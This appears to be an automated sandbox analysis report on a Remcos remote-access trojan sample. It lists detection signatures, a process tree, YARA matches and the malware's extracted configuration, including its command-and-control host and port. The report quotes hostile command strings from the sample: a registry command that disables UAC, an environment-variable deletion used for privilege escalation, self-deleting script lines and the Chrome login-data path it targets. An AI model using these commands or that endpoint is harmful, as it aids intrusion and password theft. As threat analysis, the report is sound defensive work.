Play interactive tour

Edit tour

Windows Analysis Report IQl00lxPjo

Overview

General Information

Sample Name:	IQl00lxPjo (renamed file extension from none to exe)
Analysis ID:	484282
MD5:	9b8ae8edfe553edea6108dceebcc57b8
SHA1:	eae4825368e0ed56db5484012303add569cb98e9
SHA256:	d79ba47a55b5dcb4cf6e76ac13bd3179e1523d5904483232d9ce9d39915dbc69
Tags:	32exe
Infos:
Most interesting Screenshot:

Detection

Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected Remcos RAT

Detected Remcos RAT

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Writes to foreign memory regions

Contains functionality to steal Firefox passwords or cookies

Delayed program exit found

Contains functionality to register a low level keyboard hook

Allocates memory in foreign processes

Injects a PE file into a foreign processes

Contains functionality to steal Chrome passwords or cookies

Contains functionality to inject code into remote processes

Contains functionalty to change the wallpaper

C2 URLs / IPs found in malware configuration

Creates a thread in another existing process (thread injection)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Contains functionality to launch a control a shell (cmd.exe)

Contains functionality to enumerate running services

Contains functionality to dynamically determine API calls

Contains functionality to read the clipboard data

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Extensive use of GetProcAddress (often used to hide API calls)

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Detected TCP or UDP traffic on non-standard ports

Contains functionality to download and launch executables

Uses reg.exe to modify the Windows registry

Contains functionality to retrieve information about pressed keystrokes

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Contains functionality to simulate mouse events

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

IQl00lxPjo.exe (PID: 5172 cmdline: 'C:\Users\user\Desktop\IQl00lxPjo.exe' MD5: 9B8AE8EDFE553EDEA6108DCEEBCC57B8)

DpiScaling.exe (PID: 3980 cmdline: C:\Windows\System32\DpiScaling.exe MD5: 302B1BBDBF4D96BEE99C6B45680CEB5E)

cmd.exe (PID: 6652 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 1844 cmdline: C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 4816 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 1280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

reg.exe (PID: 5736 cmdline: reg delete hkcu\Environment /v windir /f MD5: CEE2A7E57DF2A159A065A34913A055C2)

conhost.exe (PID: 6316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Dsqbhgvf.exe (PID: 4984 cmdline: 'C:\Users\Public\Libraries\Dsqbhgvf.exe' MD5: 9B8AE8EDFE553EDEA6108DCEEBCC57B8)

dialer.exe (PID: 7080 cmdline: C:\Windows\System32\dialer.exe MD5: F176211F7372248224D02AC023573870)

Dsqbhgvf.exe (PID: 5388 cmdline: 'C:\Users\Public\Libraries\Dsqbhgvf.exe' MD5: 9B8AE8EDFE553EDEA6108DCEEBCC57B8)

dialer.exe (PID: 4176 cmdline: C:\Windows\System32\dialer.exe MD5: F176211F7372248224D02AC023573870)

cleanup

Malware Configuration

Threatname: Remcos

{"Version": "3.2.1 Pro", "Host:Port:Password": "twistednerd.dvrlists.com:8618:1", "Assigned name": "Sept", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Sept-AITAB5", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "20000"}

Yara Overview

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\Public\Libraries\fvghbqsD.url	Methodology_Contains_Shortcut_OtherURIhandlers	Detects possible shortcut usage for .URL persistence	@itsreallynick (Nick Carr)	0x14:$file: URL= 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp	REMCOS_RAT_variants	unknown	unknown	0x60f12:$str_a1: C:\Windows\System32\cmd.exe 0x60e8e:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60e8e:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60496:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60aee:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x600ea:$str_b2: Executing file: 0x61056:$str_b3: GetDirectListeningPort 0x608ae:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x60ad6:$str_b7: \update.vbs 0x6013a:$str_b9: Downloaded file: 0x60126:$str_b10: Downloading file: 0x6010e:$str_b12: Failed to upload file: 0x6101e:$str_b13: StartForward 0x6103e:$str_b14: StopForward 0x60a7e:$str_b15: fso.DeleteFile " 0x60a12:$str_b16: On Error Resume Next 0x60aae:$str_b17: fso.DeleteFolder " 0x600fe:$str_b18: Uploaded file: 0x6017a:$str_b19: Unable to delete: 0x60a46:$str_b20: while fso.FileExists(" 0x605cf:$str_c0: [Firefox StoredLogins not found]
00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp	REMCOS_RAT_variants	unknown	unknown	0x606a4:$str_a1: C:\Windows\System32\cmd.exe 0x60620:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60620:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5fc28:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60280:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5f87c:$str_b2: Executing file: 0x607e8:$str_b3: GetDirectListeningPort 0x60040:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x60268:$str_b7: \update.vbs 0x5f8cc:$str_b9: Downloaded file: 0x5f8b8:$str_b10: Downloading file: 0x5f8a0:$str_b12: Failed to upload file: 0x607b0:$str_b13: StartForward 0x607d0:$str_b14: StopForward 0x60210:$str_b15: fso.DeleteFile " 0x601a4:$str_b16: On Error Resume Next 0x60240:$str_b17: fso.DeleteFolder " 0x5f890:$str_b18: Uploaded file: 0x5f90c:$str_b19: Unable to delete: 0x601d8:$str_b20: while fso.FileExists(" 0x5fd61:$str_c0: [Firefox StoredLogins not found]
00000007.00000002.926675257.0000000002FB7000.00000004.00000020.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: DpiScaling.exe PID: 3980	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
7.2.DpiScaling.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
7.2.DpiScaling.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x5f4a4:$str_a1: C:\Windows\System32\cmd.exe 0x5f420:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5f420:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5ea28:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x5f080:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5e67c:$str_b2: Executing file: 0x5f5e8:$str_b3: GetDirectListeningPort 0x5ee40:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x5f068:$str_b7: \update.vbs 0x5e6cc:$str_b9: Downloaded file: 0x5e6b8:$str_b10: Downloading file: 0x5e6a0:$str_b12: Failed to upload file: 0x5f5b0:$str_b13: StartForward 0x5f5d0:$str_b14: StopForward 0x5f010:$str_b15: fso.DeleteFile " 0x5efa4:$str_b16: On Error Resume Next 0x5f040:$str_b17: fso.DeleteFolder " 0x5e690:$str_b18: Uploaded file: 0x5e70c:$str_b19: Unable to delete: 0x5efd8:$str_b20: while fso.FileExists(" 0x5eb61:$str_c0: [Firefox StoredLogins not found]
7.2.DpiScaling.exe.10591a6e.2.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
7.2.DpiScaling.exe.10591a6e.2.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x5f4a4:$str_a1: C:\Windows\System32\cmd.exe 0x5f420:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5f420:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5ea28:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x5f080:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5e67c:$str_b2: Executing file: 0x5f5e8:$str_b3: GetDirectListeningPort 0x5ee40:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x5f068:$str_b7: \update.vbs 0x5e6cc:$str_b9: Downloaded file: 0x5e6b8:$str_b10: Downloading file: 0x5e6a0:$str_b12: Failed to upload file: 0x5f5b0:$str_b13: StartForward 0x5f5d0:$str_b14: StopForward 0x5f010:$str_b15: fso.DeleteFile " 0x5efa4:$str_b16: On Error Resume Next 0x5f040:$str_b17: fso.DeleteFolder " 0x5e690:$str_b18: Uploaded file: 0x5e70c:$str_b19: Unable to delete: 0x5efd8:$str_b20: while fso.FileExists(" 0x5eb61:$str_c0: [Firefox StoredLogins not found]
7.2.DpiScaling.exe.10591a6e.2.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
7.2.DpiScaling.exe.10591a6e.2.unpack	REMCOS_RAT_variants	unknown	unknown	0x5e2a4:$str_a1: C:\Windows\System32\cmd.exe 0x5e220:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5e220:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5d828:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x5de80:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5d47c:$str_b2: Executing file: 0x5e3e8:$str_b3: GetDirectListeningPort 0x5dc40:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x5de68:$str_b7: \update.vbs 0x5d4cc:$str_b9: Downloaded file: 0x5d4b8:$str_b10: Downloading file: 0x5d4a0:$str_b12: Failed to upload file: 0x5e3b0:$str_b13: StartForward 0x5e3d0:$str_b14: StopForward 0x5de10:$str_b15: fso.DeleteFile " 0x5dda4:$str_b16: On Error Resume Next 0x5de40:$str_b17: fso.DeleteFolder " 0x5d490:$str_b18: Uploaded file: 0x5d50c:$str_b19: Unable to delete: 0x5ddd8:$str_b20: while fso.FileExists(" 0x5d961:$str_c0: [Firefox StoredLogins not found]
7.2.DpiScaling.exe.10590000.1.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
7.2.DpiScaling.exe.10590000.1.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x60f12:$str_a1: C:\Windows\System32\cmd.exe 0x60e8e:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60e8e:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60496:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60aee:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x600ea:$str_b2: Executing file: 0x61056:$str_b3: GetDirectListeningPort 0x608ae:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x60ad6:$str_b7: \update.vbs 0x6013a:$str_b9: Downloaded file: 0x60126:$str_b10: Downloading file: 0x6010e:$str_b12: Failed to upload file: 0x6101e:$str_b13: StartForward 0x6103e:$str_b14: StopForward 0x60a7e:$str_b15: fso.DeleteFile " 0x60a12:$str_b16: On Error Resume Next 0x60aae:$str_b17: fso.DeleteFolder " 0x600fe:$str_b18: Uploaded file: 0x6017a:$str_b19: Unable to delete: 0x60a46:$str_b20: while fso.FileExists(" 0x605cf:$str_c0: [Firefox StoredLogins not found]
7.2.DpiScaling.exe.10590000.1.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
7.2.DpiScaling.exe.10590000.1.unpack	REMCOS_RAT_variants	unknown	unknown	0x60312:$str_a1: C:\Windows\System32\cmd.exe 0x6028e:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x6028e:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5f896:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x5feee:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5f4ea:$str_b2: Executing file: 0x60456:$str_b3: GetDirectListeningPort 0x5fcae:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x5fed6:$str_b7: \update.vbs 0x5f53a:$str_b9: Downloaded file: 0x5f526:$str_b10: Downloading file: 0x5f50e:$str_b12: Failed to upload file: 0x6041e:$str_b13: StartForward 0x6043e:$str_b14: StopForward 0x5fe7e:$str_b15: fso.DeleteFile " 0x5fe12:$str_b16: On Error Resume Next 0x5feae:$str_b17: fso.DeleteFolder " 0x5f4fe:$str_b18: Uploaded file: 0x5f57a:$str_b19: Unable to delete: 0x5fe46:$str_b20: while fso.FileExists(" 0x5f9cf:$str_c0: [Firefox StoredLogins not found]
7.2.DpiScaling.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
7.2.DpiScaling.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x606a4:$str_a1: C:\Windows\System32\cmd.exe 0x60620:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60620:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5fc28:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60280:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5f87c:$str_b2: Executing file: 0x607e8:$str_b3: GetDirectListeningPort 0x60040:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x60268:$str_b7: \update.vbs 0x5f8cc:$str_b9: Downloaded file: 0x5f8b8:$str_b10: Downloading file: 0x5f8a0:$str_b12: Failed to upload file: 0x607b0:$str_b13: StartForward 0x607d0:$str_b14: StopForward 0x60210:$str_b15: fso.DeleteFile " 0x601a4:$str_b16: On Error Resume Next 0x60240:$str_b17: fso.DeleteFolder " 0x5f890:$str_b18: Uploaded file: 0x5f90c:$str_b19: Unable to delete: 0x601d8:$str_b20: while fso.FileExists(" 0x5fd61:$str_c0: [Firefox StoredLogins not found]
Click to see the 7 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 7.2.DpiScaling.exe.10591a6e.2.raw.unpack

Malware Configuration Extractor: Remcos {"Version": "3.2.1 Pro", "Host:Port:Password": "twistednerd.dvrlists.com:8618:1", "Assigned name": "Sept", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Sept-AITAB5", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "20000"}

Multi AV Scanner detection for submitted file

Show sources

Source: IQl00lxPjo.exe

Virustotal: Detection: 31%

Perma Link

Yara detected Remcos RAT

Show sources

Source: Yara match	File source: 7.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.DpiScaling.exe.10591a6e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.DpiScaling.exe.10591a6e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.DpiScaling.exe.10590000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.DpiScaling.exe.10590000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.926675257.0000000002FB7000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DpiScaling.exe PID: 3980, type: MEMORYSTR

Multi AV Scanner detection for domain / URL

Show sources

Source: twistednerd.dvrlists.com	Virustotal: Detection: 10%			Perma Link
Source: twistednerd.dvrlists.com	Virustotal: Detection: 10%			Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\Public\Libraries\Dsqbhgvf.exe

Virustotal: Detection: 31%

Perma Link

Source: 7.0.DpiScaling.exe.10590000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.0.DpiScaling.exe.10590000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.DpiScaling.exe.10590000.1.unpack	Avira: Label: TR/Dropper.Gen
Source: 7.0.DpiScaling.exe.10590000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.0.DpiScaling.exe.10590000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0042E5CA CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,		7_2_0042E5CA
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_105BF438 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,		7_2_105BF438

Source: DpiScaling.exe

Binary or memory string: -----BEGIN PUBLIC KEY-----

Source: IQl00lxPjo.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI

Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0040A012 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	7_2_0040A012
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_004061C3 FindFirstFileW,FindNextFileW,	7_2_004061C3
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0040A22D FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	7_2_0040A22D
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_004153F5 FindFirstFileW,FindNextFileW,FindNextFileW,	7_2_004153F5
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_00417754 FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,	7_2_00417754
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_004077EC __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	7_2_004077EC
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_00446AF9 FindFirstFileExA,	7_2_00446AF9
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_00407C55 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	7_2_00407C55
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_10597031 FindFirstFileW,FindNextFileW,	7_2_10597031
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_1059B09B FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	7_2_1059B09B
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_105A85C2 FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,	7_2_105A85C2
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_1059AE80 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	7_2_1059AE80

Source: C:\Windows\SysWOW64\DpiScaling.exe

Code function: 7_2_0040697D SetEvent,ShellExecuteW,GetLogicalDriveStringsA,StrToIntA,CreateDirectoryW,GetFileAttributesW,DeleteFileW,

7_2_0040697D

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: twistednerd.dvrlists.com

Source: Joe Sandbox View

ASN Name: ALTUSNL ALTUSNL

Source: global traffic

TCP traffic: 192.168.2.4:49768 -> 31.3.152.100:8618

Source: unknown

DNS traffic detected: queries for: onedrive.live.com

Source: C:\Windows\SysWOW64\DpiScaling.exe

Code function: 7_2_00422251 recv,

7_2_00422251

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to register a low level keyboard hook

Show sources

Source: C:\Windows\SysWOW64\DpiScaling.exe

Code function: 7_2_10599700 SetWindowsHookExA 0000000D,0040887B,00000000

7_2_10599700

Source: C:\Windows\SysWOW64\DpiScaling.exe

Code function: 7_2_00409BD9 OpenClipboard,GetClipboardData,CloseClipboard,

7_2_00409BD9

Source: C:\Windows\SysWOW64\DpiScaling.exe

Code function: 7_2_004089BA GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,

7_2_004089BA

Source: C:\Windows\SysWOW64\DpiScaling.exe

Code function: 7_2_00409BD9 OpenClipboard,GetClipboardData,CloseClipboard,

7_2_00409BD9

E-Banking Fraud:

Yara detected Remcos RAT

Show sources

Source: Yara match	File source: 7.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.DpiScaling.exe.10591a6e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.DpiScaling.exe.10591a6e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.DpiScaling.exe.10590000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.DpiScaling.exe.10590000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.926675257.0000000002FB7000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DpiScaling.exe PID: 3980, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands:

Contains functionalty to change the wallpaper

Show sources

Source: C:\Windows\SysWOW64\DpiScaling.exe

Code function: 7_2_105A8D7E SystemParametersInfoW,

7_2_105A8D7E

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 7.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 7.2.DpiScaling.exe.10591a6e.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 7.2.DpiScaling.exe.10591a6e.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 7.2.DpiScaling.exe.10590000.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 7.2.DpiScaling.exe.10590000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 7.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown

Source: IQl00lxPjo.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI

Source: 7.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 7.2.DpiScaling.exe.10591a6e.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 7.2.DpiScaling.exe.10591a6e.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
